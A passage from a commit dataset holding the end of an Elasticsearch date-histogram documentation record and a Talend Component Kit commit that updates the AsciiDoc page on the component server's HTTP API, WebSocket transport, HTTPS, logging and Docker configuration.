see\n<<search-aggregations-bucket-histogram-aggregation-extended-bounds,`Extended Bounds`>>.\n\n===== Missing value\n\nThe `missing` parameter defines how to treat documents that are missing a value.\nBy default, they are ignored, but it is also possible to treat them as if they\nhave a value.\n\n[source,console,id=datehistogram-aggregation-missing-example]\n--------------------------------------------------\nPOST \/sales\/_search?size=0\n{\n \"aggs\" : {\n \"sale_date\" : {\n \"date_histogram\" : {\n \"field\" : \"date\",\n \"calendar_interval\": \"year\",\n \"missing\": \"2000\/01\/01\" <1>\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[setup:sales]\n\n<1> Documents without a value in the `publish_date` field will fall into the\nsame bucket as documents that have the value `2000-01-01`.\n\n===== Order\n\nBy default the returned buckets are sorted by their `key` ascending, but you can\ncontrol the order using\nthe `order` setting. This setting supports the same `order` functionality as\n<<search-aggregations-bucket-terms-aggregation-order,`Terms Aggregation`>>.\n\n===== Using a script to aggregate by day of the week\n\nWhen you need to aggregate the results by day of the week, use a script that \nreturns the day of the week:\n\n\n[source,console,id=datehistogram-aggregation-script-example]\n--------------------------------------------------\nPOST \/sales\/_search?size=0\n{\n \"aggs\": {\n \"dayOfWeek\": {\n \"terms\": {\n \"script\": {\n \"lang\": \"painless\",\n \"source\": \"doc['date'].value.dayOfWeekEnum.value\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[setup:sales]\n\nResponse:\n\n[source,console-result]\n--------------------------------------------------\n{\n ...\n \"aggregations\": {\n \"dayOfWeek\": {\n \"doc_count_error_upper_bound\": 0,\n \"sum_other_doc_count\": 0,\n \"buckets\": [\n {\n \"key\": \"7\",\n \"doc_count\": 4\n },\n {\n \"key\": \"4\",\n \"doc_count\": 3\n }\n ]\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\\.\\.\\.\/\"took\": $body.took,\"timed_out\": false,\"_shards\": $body._shards,\"hits\": $body.hits,\/]\n\nThe response will contain all the buckets having the relative day of\nthe week as key : 1 for Monday, 2 for Tuesday... 7 for Sunday.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0bb5ad60de4aa289d20d7eac9723163fbebeb27f","subject":"no more need to reference restlet studio","message":"no more need to reference restlet studio\n","repos":"chmyga\/component-runtime,chmyga\/component-runtime,chmyga\/component-runtime,chmyga\/component-runtime","old_file":"documentation\/src\/main\/antora\/modules\/ROOT\/pages\/documentation-rest.adoc","new_file":"documentation\/src\/main\/antora\/modules\/ROOT\/pages\/documentation-rest.adoc","new_contents":"= Component server and HTTP API\n:page-partial:\n:page-talend_swaggerui: true\n:description: Learn about Talend Component Kit HTTP API and the component server\n:keywords: REST API\n\n== HTTP API\n\nThe HTTP API intends to expose most Talend Component Kit features over HTTP. It is a standalone Java HTTP server.\n\nTIP: The WebSocket protocol is activated for the endpoints. Endpoints then use `\/websocket\/v1` as base instead of `\/api\/v1`. See <<websocket-transport,WebSocket>> for more details.\n\nHere is the API:\n\ninclude::{partialsdir}\/generated_rest-resources.adoc[leveloffset=+2]\n\nIMPORTANT: To make sure that the migration can be enabled, you need to set the version the component was created with in the execution configuration that you send to the server (component version is in component the detail endpoint). To do that, use `tcomp::component::version` key.\n\n=== Deprecated endpoints\n\nEndpoints that are intended to disappear will be deprecated. A `X-Talend-Warning` header will be returned with a message as value.\n\n[[websocket-transport]]\n=== WebSocket transport\n\nYou can connect yo any endpoint by:\n\n. Replacing `\/api` with `\/websocket`\n. Appending `\/<http method>` to the URL\n. Formatting the request as:\n\n[source]\n----\nSEND\ndestination: <endpoint after v1>\n<headers>\n\n<payload>^@\n----\n\nFor example:\n\n[source]\n----\nSEND\ndestination: \/component\/index\nAccept: application\/json\n\n^@\n----\n\nThe response is formatted as follows:\n\n[source]\n----\nMESSAGE\nstatus: <http status code>\n<headers>\n\n<payload>^@\n----\n\nTIP: All endpoints are logged at startup. You can then find them in the logs if you have a doubt about which one to use.\n\nIf you don't want to create a pool of connections per endpoint\/verb, you can use the bus endpoint: `\/websocket\/v1\/bus`.\nThis endpoint requires that you add the `destinationMethod` header to each request with the verb value (`GET` by default):\n\n[source]\n----\nSEND\ndestination: \/component\/index\ndestinationMethod: GET\nAccept: application\/json\n\n^@\n----\n\n== HTTPS activation\n\nUsing the server ZIP (or https:\/\/github.com\/Talend\/component-runtime\/blob\/master\/.docker\/Dockerfile[Docker image]), you can configure HTTPS by adding properties to `MEECROWAVE_OPTS`. Assuming that you have a certificate in `\/opt\/certificates\/component.p12` (don't forget to add\/mount it in the Docker image if you use it), you can activate it as follows:\n\n[source,bash]\n----\n# use -e for Docker\n#\n# this skips the http port binding and only binds https on the port 8443, and setups the correct certificate\nexport MEECROWAVE_OPTS=\"-Dskip-http=true -Dssl=true -Dhttps=8443 -Dkeystore-type=PKCS12 -Dkeystore-alias=talend -Dkeystore-password=talend -Dkeystore-file=\/opt\/certificates\/component.p12\"\n----\n\n== Web forms and REST API\n\nThe `component-form` library provides a way to build a component REST API facade that is compatible with React form library.\n\nfor example:\n\n[source,java]\n----\n@Path(\"tacokit-facade\")\n@ApplicationScoped\npublic class ComponentFacade {\n private static final String[] EMPTY_ARRAY = new String[0];\n\n @Inject\n private Client client;\n\n @Inject\n private ActionService actionService;\n\n @Inject\n private UiSpecService uiSpecService;\n\n @Inject \/\/ assuming it is available in your app, use any client you want\n private WebTarget target;\n\n @POST\n @Path(\"action\")\n public void action(@Suspended final AsyncResponse response, @QueryParam(\"family\") final String family,\n @QueryParam(\"type\") final String type, @QueryParam(\"action\") final String action,\n final Map<String, Object> params) {\n client.action(family, type, action, params).handle((r, e) -> {\n if (e != null) {\n onException(response, e);\n } else {\n response.resume(actionService.map(type, r));\n }\n return null;\n });\n }\n\n @GET\n @Path(\"index\")\n public void getIndex(@Suspended final AsyncResponse response,\n @QueryParam(\"language\") @DefaultValue(\"en\") final String language) {\n target\n .path(\"component\/index\")\n .queryParam(\"language\", language)\n .request(APPLICATION_JSON_TYPE)\n .rx()\n .get(ComponentIndices.class)\n .toCompletableFuture()\n .handle((index, e) -> {\n if (e != null) {\n onException(response, e);\n } else {\n index.getComponents().stream().flatMap(c -> c.getLinks().stream()).forEach(\n link -> link.setPath(link.getPath().replaceFirst(\"\/component\/\", \"\/application\/\").replace(\n \"\/details?identifiers=\", \"\/detail\/\")));\n response.resume(index);\n }\n return null;\n });\n }\n\n @GET\n @Path(\"detail\/{id}\")\n public void getDetail(@Suspended final AsyncResponse response,\n @QueryParam(\"language\") @DefaultValue(\"en\") final String language, @PathParam(\"id\") final String id) {\n target\n .path(\"component\/details\")\n .queryParam(\"language\", language)\n .queryParam(\"identifiers\", id)\n .request(APPLICATION_JSON_TYPE)\n .rx()\n .get(ComponentDetailList.class)\n .toCompletableFuture()\n .thenCompose(result -> uiSpecService.convert(result.getDetails().iterator().next()))\n .handle((result, e) -> {\n if (e != null) {\n onException(response, e);\n } else {\n response.resume(result);\n }\n return null;\n });\n }\n\n private void onException(final AsyncResponse response, final Throwable e) {\n final UiActionResult payload;\n final int status;\n if (WebException.class.isInstance(e)) {\n final WebException we = WebException.class.cast(e);\n status = we.getStatus();\n payload = actionService.map(we);\n } else if (CompletionException.class.isInstance(e)) {\n final CompletionException actualException = CompletionException.class.cast(e);\n log.error(actualException.getMessage(), actualException);\n status = Response.Status.BAD_GATEWAY.getStatusCode();\n payload = actionService.map(new WebException(actualException, -1, emptyMap()));\n } else {\n log.error(e.getMessage(), e);\n status = Response.Status.BAD_GATEWAY.getStatusCode();\n payload = actionService.map(new WebException(e, -1, emptyMap()));\n }\n response.resume(new WebApplicationException(Response.status(status).entity(payload).build()));\n }\n}\n----\n\nNOTE: the `Client` can be created using `ClientFactory.createDefault(System.getProperty(\"app.components.base\", \"http:\/\/localhost:8080\/api\/v1\"))` and the service can be a simple `new UiSpecService<>()`. The factory uses JAX-RS if the API is available (assuming a JSON-B provider is registered). Otherwise, it tries to use Spring.\n\nThe conversion from the component model (REST API) to the uiSpec model is done through `UiSpecService`. It is based on the object model which is mapped to a UI model. Having a flat model in the component REST API allows to customize layers easily.\n\nYou can completely control the available components, tune the rendering by switching the `uiSchema`, and add or remove parts of the form.\nYou can also add custom actions and buttons for specific needs of the application.\n\nNOTE: The\u00a0`\/migrate` endpoint was not shown in the previous snippet but if you need it, add it as well.\n\n=== Using the UiSpec model without the tooling\n\n[source,xml]\n----\n<dependency>\n <groupId>org.talend.sdk.component<\/groupId>\n <artifactId>component-form-model<\/artifactId>\n <version>${talend-component-kit.version}<\/version>\n<\/dependency>\n----\n\nThis Maven dependency provides the UISpec model classes. You can use the `Ui` API (with or without the builders) to create UiSpec representations.\n\nFor Example:\n\n[source,java]\n----\nfinal Ui form1 = ui()\n .withJsonSchema(JsonSchema.jsonSchemaFrom(Form1.class).build()) <1>\n .withUiSchema(uiSchema() <2>\n .withKey(\"multiSelectTag\")\n .withRestricted(false)\n .withTitle(\"Simple multiSelectTag\")\n .withDescription(\"This data list accepts values that are not in the list of suggestions\")\n .withWidget(\"multiSelectTag\")\n .build())\n .withProperties(myFormInstance) <3>\n .build();\n\nfinal String json = jsonb.toJson(form1); <4>\n----\n<1> The `JsonSchema` is extracted from reflection on the `Form1` class. Note that `@JsonSchemaIgnore` allows to ignore a field and `@JsonSchemaProperty` allows to rename a property.\n<2> A `UiSchema` is programmatically built using the builder API.\n<3> An instance of the form is passed to let the serializer extract its JSON model.\n<4> The `Ui` model, which can be used by UiSpec compatible front widgets, is serialized.\n\nThe model uses the JSON-B API to define the binding. Make sure to have an implementation in your classpath. To do that, add the following dependencies:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.geronimo.specs<\/groupId>\n <artifactId>geronimo-jsonb_1.0_spec<\/artifactId>\n <version>1.0<\/version>\n<\/dependency>\n<dependency>\n <groupId>org.apache.geronimo.specs<\/groupId>\n <artifactId>geronimo-json_1.1_spec<\/artifactId>\n <version>1.0<\/version>\n<\/dependency>\n<dependency>\n <groupId>org.apache.johnzon<\/groupId>\n <artifactId>johnzon-jsonb<\/artifactId>\n <version>${johnzon.version}<\/version> <!-- 1.1.5 for instance -->\n<\/dependency>\n----\n\n=== JavaScript integration\n\nIMPORTANT: `component-kit.js` is no more available (previous versions stay on NPM) since it got replaced by `@talend\/react-containers`.\nThe previous import can be replaced by `import kit from '@talend\/react-containers\/lib\/ComponentForm\/kit';`.\n\nDefault JavaScript integration goes through the link:https:\/\/github.com\/Talend\/ui\/tree\/master\/packages\/forms[Talend UI Forms] library\nand its link:https:\/\/github.com\/Talend\/ui\/tree\/master\/packages\/containers[Containers] wrapper.\n\nDocumentation is now available on the previous link.\n\n== Logging\n\nThe logging uses Log4j2. You can specify a custom configuration by using the `-Dlog4j.configurationFile` system property or by adding a `log4j2.xml` file to the classpath.\n\nHere are some common configurations:\n\n- Console logging:\n\n[source,xml]\n----\n<?xml version=\"1.0\"?>\n<Configuration status=\"INFO\">\n <Appenders>\n <Console name=\"Console\" target=\"SYSTEM_OUT\">\n <PatternLayout pattern=\"[%d{HH:mm:ss.SSS}][%highlight{%-5level}][%15.15t][%30.30logger] %msg%n\"\/>\n <\/Console>\n <\/Appenders>\n <Loggers>\n <Root level=\"INFO\">\n <AppenderRef ref=\"Console\"\/>\n <\/Root>\n <\/Loggers>\n<\/Configuration>\n----\n\nOutput messages look like:\n\n[source]\n----\n[16:59:58.198][INFO ][ main][oyote.http11.Http11NioProtocol] Initializing ProtocolHandler [\"http-nio-34763\"]\n----\n\n- JSON logging:\n\n[source,xml]\n----\n<?xml version=\"1.0\"?>\n<Configuration status=\"INFO\">\n <Properties>\n <!-- DO NOT PUT logSource there, it is useless and slow -->\n <Property name=\"jsonLayout\">{\"severity\":\"%level\",\"logMessage\":\"%encode{%message}{JSON}\",\"logTimestamp\":\"%d{ISO8601}{UTC}\",\"eventUUID\":\"%uuid{RANDOM}\",\"@version\":\"1\",\"logger.name\":\"%encode{%logger}{JSON}\",\"host.name\":\"${hostName}\",\"threadName\":\"%encode{%thread}{JSON}\",\"stackTrace\":\"%encode{%xThrowable{full}}{JSON}\"}%n<\/Property>\n <\/Properties>\n <Appenders>\n <Console name=\"Console\" target=\"SYSTEM_OUT\">\n <PatternLayout pattern=\"${jsonLayout}\"\/>\n <\/Console>\n <\/Appenders>\n <Loggers>\n <Root level=\"INFO\">\n <AppenderRef ref=\"Console\"\/>\n <\/Root>\n <\/Loggers>\n<\/Configuration>\n----\n\nOutput messages look like:\n\n[source]\n----\n{\"severity\":\"INFO\",\"logMessage\":\"Initializing ProtocolHandler [\\\"http-nio-46421\\\"]\",\"logTimestamp\":\"2017-11-20T16:04:01,763\",\"eventUUID\":\"8b998e17-7045-461c-8acb-c43f21d995ff\",\"@version\":\"1\",\"logger.name\":\"org.apache.coyote.http11.Http11NioProtocol\",\"host.name\":\"TLND-RMANNIBUCAU\",\"threadName\":\"main\",\"stackTrace\":\"\"}\n----\n\n- Rolling file appender:\n\n[source,xml]\n----\n<?xml version=\"1.0\"?>\n<Configuration status=\"INFO\">\n <Appenders>\n <RollingRandomAccessFile name=\"File\" fileName=\"${LOG_PATH}\/application.log\" filePattern=\"${LOG_PATH}\/application-%d{yyyy-MM-dd}.log\">\n <PatternLayout pattern=\"[%d{HH:mm:ss.SSS}][%highlight{%-5level}][%15.15t][%30.30logger] %msg%n\"\/>\n <Policies>\n <SizeBasedTriggeringPolicy size=\"100 MB\" \/>\n <TimeBasedTriggeringPolicy interval=\"1\" modulate=\"true\"\/>\n <\/Policies>\n <\/RollingRandomAccessFile>\n <\/Appenders>\n <Loggers>\n <Root level=\"INFO\">\n <AppenderRef ref=\"File\"\/>\n <\/Root>\n <\/Loggers>\n<\/Configuration>\n----\n\nMore details are available in the link:https:\/\/logging.apache.org\/log4j\/2.x\/manual\/appenders.html#RollingFileAppender[RollingFileAppender] documentation.\n\nTIP: You can compose previous layout (message format) and appenders (where logs are written).\n\ninclude::server-uispec.adoc[leveloffset=+1]\n\n== Docker\n\nThe server image is deployed on Docker. Its version is suffixed with a timestamp to ensure\nimages are not overriden and can break your usage. You can check the available version on Docker hub.\n\n\n=== Run\n\nYou can run the docker image by executing this command :\n\n[source,sh]\n----\n$ sudo docker run -p 8080:8080 tacokit\/component-starter\n----\n\n=== Configure\n\nYou can set the env variable `MEECROWAVE_OPTS` to customize the server, by default it is installed in `\/opt\/talend\/component-kit`.\n\n=== Maven repository\n\nThe maven repository is the default one of the machine, you can change it setting the system property\n`talend_component_server_maven_repository=\/path\/to\/your\/m2`.\n\n==== Deploy components to the server\n\nIf you want to deploy some components you can configure which ones in MEECROWAVE_OPTS (see server doc online)\nand redirect your local m2:\n\n[source,sh]\n----\n$ docker run \\\n -p 8080:8080 \\\n -v ~\/.m2:\/root\/.m2 \\\n -e MEECROWAVE_OPTS=\"-Dtalend.component.server.component.coordinates=g:a:v,g2:a2:v2,...\" \\\n component-server\n----\n\n=== Logging\n\nThe component server docker image comes with two log4j2 profile `default` and `kafka`.\nThe logging profile can be changed by setting the environment variable `TALEND_COMPONENT_LOG4J2_PROFILE` to `kafka`\nthe `default` profile is active by default.\n\n==== default profile\n\nThe *default* profile has file and console logging capabilities.\nThe console logging is off by default and you can activate it by setting `CONSOLE_LOG_LEVEL` environment variable\nto `DEBUG`, `INFO`, `WARN` or any other log level supported by log4j2. In practise and during development you will want\nto see the logs without connecting to the server by activating console logging.\n\nRun docker image with console logging\n\n[source,sh]\n----\nsudo docker run -p 8080:8080 \\\n\t-e CONSOLE_LOG_LEVEL=INFO \\\n\tcomponent-server\n----\n\n==== Kafka profile\n\n*Kafka* profile let you send log to Kafka servers. The log are formatted in json and follow the layout defined by Talend\nand described here https:\/\/github.com\/Talend\/daikon\/tree\/master\/daikon-logging\/logging-event-layout\n\nThis profile require two environment variables\n\n* `LOG_KAFKA_TOPIC` : Kafka topic.\n* `LOG_KAFKA_URL` : A list of host\/port pairs to use for establishing the initial connection to the Kafka cluster.\nThis list should be in the form `url:port` separated by `,`\n\nRun docker image with kafka profile\n\n[source,sh]\n----\nsudo docker run -p 8080:8080 \\\n -e TALEND_COMPONENT_LOG4J2_PROFILE=kafka \\\n -e LOG_KAFKA_URL=`log kafka url:port` \\\n -e LOG_KAFKA_TOPIC=`log kafka topic` \\\n\t-e TRACING_KAFKA_URL=`tracing kafka url:port` \\\n\t-e TRACING_KAFKA_TOPIC=`tracing kafka topic` \\\n\ttacokit\/component-server\n----\n\n*Note* : `LOG_KAFKA_TOPIC` will receive the application and the access logs\nand `TRACING_KAFKA_TOPIC` will receive brave tracing logs.\n\n==== Tracing (Brave Monitoring)\n\nThe component server use https:\/\/github.com\/openzipkin\/brave to monitor request.\n\nThe tracing can be activated by setting environment variable `TRACING_ON` to `true`.\n\nYou can choose the reporter type by setting `talend_component_server_monitoring_brave_reporter_type` environment variable\nto `log` (this is the default value in this docker image) or to `noop`\nwhich will deactivate the tracing. __Other type of reporter may be added in the future.__\n\nThe tracing rate is configurable by setting environment variable `TRACING_SAMPLING_RATE`.\nThis is the default sample rate for all the endpoints and has a default value of 0.1\n\nYou can define more accurate rate for every component server endpoint using those environment variables :\n\n[options=\"header,autowidth\"]\n|===\n| Environment variable | Endpoint\n| `talend_component_server_monitoring_brave_sampling_environment_rate` | `\/api\/v1\/environment`\n| `talend_component_server_monitoring_brave_sampling_configurationtype_rate` | `\/api\/v1\/configurationtype`\n| `talend_component_server_monitoring_brave_sampling_component_rate` | `\/api\/v1\/component`\n| `talend_component_server_monitoring_brave_sampling_documentation_rate` | `\/api\/v1\/documentation`\n| `talend_component_server_monitoring_brave_sampling_action_rate` | `\/api\/v1\/action`\n| `talend_component_server_monitoring_brave_sampling_execution_rate` | `\/api\/v1\/execution`\n|===\n\nRun docker image with tracing on\n\n[source,sh]\n----\nsudo docker run -p 8080:8080 \\\n\t-e TRACING_ON=true \\\n\t-e TRACING_SAMPLING_RATE = 0.1 \\\n\ttacokit\/component-server\n----\n\n=== Build the image yourself\n\nYou can build component starter server in docker following those instructions :\n\n[source,sh]\n----\ndocker build --build-arg ARTIFACT_ID=component-starter-server \\\n --build-arg SERVER_VERSION=`component starter server version` \\\n --tag tacokit\/component-server .\n----\n\nIMPORTANT: this assumes the project is built before you run that command.\n","old_contents":"= Component server and HTTP API\n:page-partial:\n:page-talend_swaggerui: true\n:description: Learn about Talend Component Kit HTTP API and the component server\n:keywords: REST API\n\nTIP: A test environment is available on Heroku and can be browsed using Talend Component Kit Server instance on link:https:\/\/talend-component-kit.restlet.io[Restlet Studio^].\n\n== HTTP API\n\nThe HTTP API intends to expose most Talend Component Kit features over HTTP. It is a standalone Java HTTP server.\n\nTIP: The WebSocket protocol is activated for the endpoints. Endpoints then use `\/websocket\/v1` as base instead of `\/api\/v1`. See <<websocket-transport,WebSocket>> for more details.\n\nHere is the API:\n\ninclude::{partialsdir}\/generated_rest-resources.adoc[leveloffset=+2]\n\nIMPORTANT: To make sure that the migration can be enabled, you need to set the version the component was created with in the execution configuration that you send to the server (component version is in component the detail endpoint). To do that, use `tcomp::component::version` key.\n\n=== Deprecated endpoints\n\nEndpoints that are intended to disappear will be deprecated. A `X-Talend-Warning` header will be returned with a message as value.\n\n[[websocket-transport]]\n=== WebSocket transport\n\nYou can connect yo any endpoint by:\n\n. Replacing `\/api` with `\/websocket`\n. Appending `\/<http method>` to the URL\n. Formatting the request as:\n\n[source]\n----\nSEND\ndestination: <endpoint after v1>\n<headers>\n\n<payload>^@\n----\n\nFor example:\n\n[source]\n----\nSEND\ndestination: \/component\/index\nAccept: application\/json\n\n^@\n----\n\nThe response is formatted as follows:\n\n[source]\n----\nMESSAGE\nstatus: <http status code>\n<headers>\n\n<payload>^@\n----\n\nTIP: All endpoints are logged at startup. You can then find them in the logs if you have a doubt about which one to use.\n\nIf you don't want to create a pool of connections per endpoint\/verb, you can use the bus endpoint: `\/websocket\/v1\/bus`.\nThis endpoint requires that you add the `destinationMethod` header to each request with the verb value (`GET` by default):\n\n[source]\n----\nSEND\ndestination: \/component\/index\ndestinationMethod: GET\nAccept: application\/json\n\n^@\n----\n\n== HTTPS activation\n\nUsing the server ZIP (or https:\/\/github.com\/Talend\/component-runtime\/blob\/master\/.docker\/Dockerfile[Docker image]), you can configure HTTPS by adding properties to `MEECROWAVE_OPTS`. Assuming that you have a certificate in `\/opt\/certificates\/component.p12` (don't forget to add\/mount it in the Docker image if you use it), you can activate it as follows:\n\n[source,bash]\n----\n# use -e for Docker\n#\n# this skips the http port binding and only binds https on the port 8443, and setups the correct certificate\nexport MEECROWAVE_OPTS=\"-Dskip-http=true -Dssl=true -Dhttps=8443 -Dkeystore-type=PKCS12 -Dkeystore-alias=talend -Dkeystore-password=talend -Dkeystore-file=\/opt\/certificates\/component.p12\"\n----\n\n== Web forms and REST API\n\nThe `component-form` library provides a way to build a component REST API facade that is compatible with React form library.\n\nfor example:\n\n[source,java]\n----\n@Path(\"tacokit-facade\")\n@ApplicationScoped\npublic class ComponentFacade {\n private static final String[] EMPTY_ARRAY = new String[0];\n\n @Inject\n private Client client;\n\n @Inject\n private ActionService actionService;\n\n @Inject\n private UiSpecService uiSpecService;\n\n @Inject \/\/ assuming it is available in your app, use any client you want\n private WebTarget target;\n\n @POST\n @Path(\"action\")\n public void action(@Suspended final AsyncResponse response, @QueryParam(\"family\") final String family,\n @QueryParam(\"type\") final String type, @QueryParam(\"action\") final String action,\n final Map<String, Object> params) {\n client.action(family, type, action, params).handle((r, e) -> {\n if (e != null) {\n onException(response, e);\n } else {\n response.resume(actionService.map(type, r));\n }\n return null;\n });\n }\n\n @GET\n @Path(\"index\")\n public void getIndex(@Suspended final AsyncResponse response,\n @QueryParam(\"language\") @DefaultValue(\"en\") final String language) {\n target\n .path(\"component\/index\")\n .queryParam(\"language\", language)\n .request(APPLICATION_JSON_TYPE)\n .rx()\n .get(ComponentIndices.class)\n .toCompletableFuture()\n .handle((index, e) -> {\n if (e != null) {\n onException(response, e);\n } else {\n index.getComponents().stream().flatMap(c -> c.getLinks().stream()).forEach(\n link -> link.setPath(link.getPath().replaceFirst(\"\/component\/\", \"\/application\/\").replace(\n \"\/details?identifiers=\", \"\/detail\/\")));\n response.resume(index);\n }\n return null;\n });\n }\n\n @GET\n @Path(\"detail\/{id}\")\n public void getDetail(@Suspended final AsyncResponse response,\n @QueryParam(\"language\") @DefaultValue(\"en\") final String language, @PathParam(\"id\") final String id) {\n target\n .path(\"component\/details\")\n .queryParam(\"language\", language)\n .queryParam(\"identifiers\", id)\n .request(APPLICATION_JSON_TYPE)\n .rx()\n .get(ComponentDetailList.class)\n .toCompletableFuture()\n .thenCompose(result -> uiSpecService.convert(result.getDetails().iterator().next()))\n .handle((result, e) -> {\n if (e != null) {\n onException(response, e);\n } else {\n response.resume(result);\n }\n return null;\n });\n }\n\n private void onException(final AsyncResponse response, final Throwable e) {\n final UiActionResult payload;\n final int status;\n if (WebException.class.isInstance(e)) {\n final WebException we = WebException.class.cast(e);\n status = we.getStatus();\n payload = actionService.map(we);\n } else if (CompletionException.class.isInstance(e)) {\n final CompletionException actualException = CompletionException.class.cast(e);\n log.error(actualException.getMessage(), actualException);\n status = Response.Status.BAD_GATEWAY.getStatusCode();\n payload = actionService.map(new WebException(actualException, -1, emptyMap()));\n } else {\n log.error(e.getMessage(), e);\n status = Response.Status.BAD_GATEWAY.getStatusCode();\n payload = actionService.map(new WebException(e, -1, emptyMap()));\n }\n response.resume(new WebApplicationException(Response.status(status).entity(payload).build()));\n }\n}\n----\n\nNOTE: the `Client` can be created using `ClientFactory.createDefault(System.getProperty(\"app.components.base\", \"http:\/\/localhost:8080\/api\/v1\"))` and the service can be a simple `new UiSpecService<>()`. The factory uses JAX-RS if the API is available (assuming a JSON-B provider is registered). Otherwise, it tries to use Spring.\n\nThe conversion from the component model (REST API) to the uiSpec model is done through `UiSpecService`. It is based on the object model which is mapped to a UI model. Having a flat model in the component REST API allows to customize layers easily.\n\nYou can completely control the available components, tune the rendering by switching the `uiSchema`, and add or remove parts of the form.\nYou can also add custom actions and buttons for specific needs of the application.\n\nNOTE: The\u00a0`\/migrate` endpoint was not shown in the previous snippet but if you need it, add it as well.\n\n=== Using the UiSpec model without the tooling\n\n[source,xml]\n----\n<dependency>\n <groupId>org.talend.sdk.component<\/groupId>\n <artifactId>component-form-model<\/artifactId>\n <version>${talend-component-kit.version}<\/version>\n<\/dependency>\n----\n\nThis Maven dependency provides the UISpec model classes. You can use the `Ui` API (with or without the builders) to create UiSpec representations.\n\nFor Example:\n\n[source,java]\n----\nfinal Ui form1 = ui()\n .withJsonSchema(JsonSchema.jsonSchemaFrom(Form1.class).build()) <1>\n .withUiSchema(uiSchema() <2>\n .withKey(\"multiSelectTag\")\n .withRestricted(false)\n .withTitle(\"Simple multiSelectTag\")\n .withDescription(\"This data list accepts values that are not in the list of suggestions\")\n .withWidget(\"multiSelectTag\")\n .build())\n .withProperties(myFormInstance) <3>\n .build();\n\nfinal String json = jsonb.toJson(form1); <4>\n----\n<1> The `JsonSchema` is extracted from reflection on the `Form1` class. Note that `@JsonSchemaIgnore` allows to ignore a field and `@JsonSchemaProperty` allows to rename a property.\n<2> A `UiSchema` is programmatically built using the builder API.\n<3> An instance of the form is passed to let the serializer extract its JSON model.\n<4> The `Ui` model, which can be used by UiSpec compatible front widgets, is serialized.\n\nThe model uses the JSON-B API to define the binding. Make sure to have an implementation in your classpath. To do that, add the following dependencies:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.geronimo.specs<\/groupId>\n <artifactId>geronimo-jsonb_1.0_spec<\/artifactId>\n <version>1.0<\/version>\n<\/dependency>\n<dependency>\n <groupId>org.apache.geronimo.specs<\/groupId>\n <artifactId>geronimo-json_1.1_spec<\/artifactId>\n <version>1.0<\/version>\n<\/dependency>\n<dependency>\n <groupId>org.apache.johnzon<\/groupId>\n <artifactId>johnzon-jsonb<\/artifactId>\n <version>${johnzon.version}<\/version> <!-- 1.1.5 for instance -->\n<\/dependency>\n----\n\n=== JavaScript integration\n\nIMPORTANT: `component-kit.js` is no more available (previous versions stay on NPM) since it got replaced by `@talend\/react-containers`.\nThe previous import can be replaced by `import kit from '@talend\/react-containers\/lib\/ComponentForm\/kit';`.\n\nDefault JavaScript integration goes through the link:https:\/\/github.com\/Talend\/ui\/tree\/master\/packages\/forms[Talend UI Forms] library\nand its link:https:\/\/github.com\/Talend\/ui\/tree\/master\/packages\/containers[Containers] wrapper.\n\nDocumentation is now available on the previous link.\n\n== Logging\n\nThe logging uses Log4j2. You can specify a custom configuration by using the `-Dlog4j.configurationFile` system property or by adding a `log4j2.xml` file to the classpath.\n\nHere are some common configurations:\n\n- Console logging:\n\n[source,xml]\n----\n<?xml version=\"1.0\"?>\n<Configuration status=\"INFO\">\n <Appenders>\n <Console name=\"Console\" target=\"SYSTEM_OUT\">\n <PatternLayout pattern=\"[%d{HH:mm:ss.SSS}][%highlight{%-5level}][%15.15t][%30.30logger] %msg%n\"\/>\n <\/Console>\n <\/Appenders>\n <Loggers>\n <Root level=\"INFO\">\n <AppenderRef ref=\"Console\"\/>\n <\/Root>\n <\/Loggers>\n<\/Configuration>\n----\n\nOutput messages look like:\n\n[source]\n----\n[16:59:58.198][INFO ][ main][oyote.http11.Http11NioProtocol] Initializing ProtocolHandler [\"http-nio-34763\"]\n----\n\n- JSON logging:\n\n[source,xml]\n----\n<?xml version=\"1.0\"?>\n<Configuration status=\"INFO\">\n <Properties>\n <!-- DO NOT PUT logSource there, it is useless and slow -->\n <Property name=\"jsonLayout\">{\"severity\":\"%level\",\"logMessage\":\"%encode{%message}{JSON}\",\"logTimestamp\":\"%d{ISO8601}{UTC}\",\"eventUUID\":\"%uuid{RANDOM}\",\"@version\":\"1\",\"logger.name\":\"%encode{%logger}{JSON}\",\"host.name\":\"${hostName}\",\"threadName\":\"%encode{%thread}{JSON}\",\"stackTrace\":\"%encode{%xThrowable{full}}{JSON}\"}%n<\/Property>\n <\/Properties>\n <Appenders>\n <Console name=\"Console\" target=\"SYSTEM_OUT\">\n <PatternLayout pattern=\"${jsonLayout}\"\/>\n <\/Console>\n <\/Appenders>\n <Loggers>\n <Root level=\"INFO\">\n <AppenderRef ref=\"Console\"\/>\n <\/Root>\n <\/Loggers>\n<\/Configuration>\n----\n\nOutput messages look like:\n\n[source]\n----\n{\"severity\":\"INFO\",\"logMessage\":\"Initializing ProtocolHandler [\\\"http-nio-46421\\\"]\",\"logTimestamp\":\"2017-11-20T16:04:01,763\",\"eventUUID\":\"8b998e17-7045-461c-8acb-c43f21d995ff\",\"@version\":\"1\",\"logger.name\":\"org.apache.coyote.http11.Http11NioProtocol\",\"host.name\":\"TLND-RMANNIBUCAU\",\"threadName\":\"main\",\"stackTrace\":\"\"}\n----\n\n- Rolling file appender:\n\n[source,xml]\n----\n<?xml version=\"1.0\"?>\n<Configuration status=\"INFO\">\n <Appenders>\n <RollingRandomAccessFile name=\"File\" fileName=\"${LOG_PATH}\/application.log\" filePattern=\"${LOG_PATH}\/application-%d{yyyy-MM-dd}.log\">\n <PatternLayout pattern=\"[%d{HH:mm:ss.SSS}][%highlight{%-5level}][%15.15t][%30.30logger] %msg%n\"\/>\n <Policies>\n <SizeBasedTriggeringPolicy size=\"100 MB\" \/>\n <TimeBasedTriggeringPolicy interval=\"1\" modulate=\"true\"\/>\n <\/Policies>\n <\/RollingRandomAccessFile>\n <\/Appenders>\n <Loggers>\n <Root level=\"INFO\">\n <AppenderRef ref=\"File\"\/>\n <\/Root>\n <\/Loggers>\n<\/Configuration>\n----\n\nMore details are available in the link:https:\/\/logging.apache.org\/log4j\/2.x\/manual\/appenders.html#RollingFileAppender[RollingFileAppender] documentation.\n\nTIP: You can compose previous layout (message format) and appenders 